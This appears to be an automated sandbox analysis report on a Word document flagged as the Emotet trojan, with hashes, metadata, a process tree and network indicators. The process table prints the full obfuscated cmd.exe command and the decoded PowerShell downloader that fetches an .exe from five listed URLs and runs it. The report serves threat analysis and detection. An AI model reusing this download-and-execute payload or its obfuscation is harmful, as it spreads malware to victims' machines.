File name: | 15_Januar_2019.doc |
Full analysis: | https://app.any.run/tasks/ee3ed728-b9b9-4fdd-b1e9-b0eaaab1c86c |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 18, 2019, 09:46:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 18:14:00 2019, Last Saved Time/Date: Tue Jan 15 18:14:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | A7D9C91DD296745CC5FDD6987B9FAA8D |
SHA1: | 595501FD3CAE9601015DC24BD51A3786D64FF58F |
SHA256: | 98081B4049E02B007390F7F3D833D1BA526812F966828D0972DFB8E1FAEEAF6C |
SSDEEP: | 3072:VN8GhDS0o9zTGOZD6EbzCdn+0Bkbj1Q3:VHoUOZDlben+0Kbp |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:15 18:14:00 |
ModifyDate: | 2019:01:15 18:14:00 |
Pages: | 1 |
Words: | - |
Characters: | 3 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 3 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2932 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\15_Januar_2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2476 | "C:\Windows\system32\cmd.exe" /c %PRoGRAMDATa:~0,1%%PRogRAMData:~9,2% /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3076 | CmD /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3288 | C:\Windows\system32\cmd.exe /S /D /c" eCHO %Kq%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3392 | cmD.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3900 | powershell $Tastytk='CheckingAccountdp';$ErgonomicWoodenTowelsjr=new-object Net.WebClient;$Rubberhb='http://www.forma-31.ru/x9w0Q_aJ9eUDi_0@http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM@http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v@http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q@http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd'.Split('@');$IntelligentCottonChipsvv='SleekCottonShirtdj';$ComputersBooksdl = '185';$hapticml='Berkshirejc';$deployww=$env:public+'\'+$ComputersBooksdl+'.exe';foreach($arrayaw in $Rubberhb){try{$ErgonomicWoodenTowelsjr.DownloadFile($arrayaw, $deployww);$depositvm='Metaljk';If ((Get-Item $deployww).length -ge 80000) {Invoke-Item $deployww;$Texastw='Fullyconfigurablenr';break;}}catch{}}$limekr='Computerswj'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR87B4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FDAAC77D.wmf | — | |
MD5:— | SHA256:— | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3E00393.wmf | — | |
MD5:— | SHA256:— | |||
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DESUJ70AHUBEKLJOOG21.temp | — | |
MD5:— | SHA256:— | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D7E226C.wmf | wmf | |
MD5:B8995D5F60D0DD28071E47BD2C2D288F | SHA256:AD8E5B2372EA91B8AC17B8083FAADAF7C07CFDC256F1E431EB9AF7EDC0DFB155 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:70B14D807AC82B9DF21F18C147184D05 | SHA256:467EFFBC023347E7659FBAE0D736FB6AC5233686D4FFE34258BAE276F4C55967 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\685CEF5A.wmf | wmf | |
MD5:5D4B1E7B85591BB4EC13AB590A7DF84E | SHA256:978AFC8A44609673E41EA6FA6C2BC6251A8E45D6573F6BA26DB77F967554EB89 | |||
2932 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$_Januar_2019.doc | pgc | |
MD5:17EF68127D2447EFD8BD64D1F10E1D1D | SHA256:170198C9B6AD7C4A89EA9CB6A287EA765D4BFDB0F0FA792DE464240DBAE2774F | |||
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19964b.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3900 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3900 | powershell.exe | GET | 404 | 103.18.6.24:80 | http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM | VN | xml | 345 b | suspicious |
3900 | powershell.exe | GET | 404 | 77.222.63.27:80 | http://www.forma-31.ru/x9w0Q_aJ9eUDi_0 | RU | xml | 345 b | suspicious |
3900 | powershell.exe | GET | 404 | 159.89.138.46:80 | http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v | US | xml | 345 b | unknown |
3900 | powershell.exe | GET | 404 | 84.54.204.244:80 | http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q | RU | xml | 345 b | suspicious |
3900 | powershell.exe | GET | 404 | 162.215.249.12:80 | http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd | US | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3900 | powershell.exe | 77.222.63.27:80 | www.forma-31.ru | SpaceWeb Ltd | RU | suspicious |
3900 | powershell.exe | 84.54.204.244:80 | www.kiber-soft.ru | PJSC Rostelecom | RU | suspicious |
3900 | powershell.exe | 159.89.138.46:80 | www.viajesdelbosque.com | — | US | unknown |
3900 | powershell.exe | 103.18.6.24:80 | codienlanhnme.vn | GMO RUNSYSTEM JSC | VN | suspicious |
3900 | powershell.exe | 162.215.249.12:80 | www.yogaspaceme.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.forma-31.ru |
| suspicious |
codienlanhnme.vn |
| suspicious |
www.viajesdelbosque.com |
| unknown |
www.kiber-soft.ru |
| suspicious |
www.yogaspaceme.com |
| suspicious |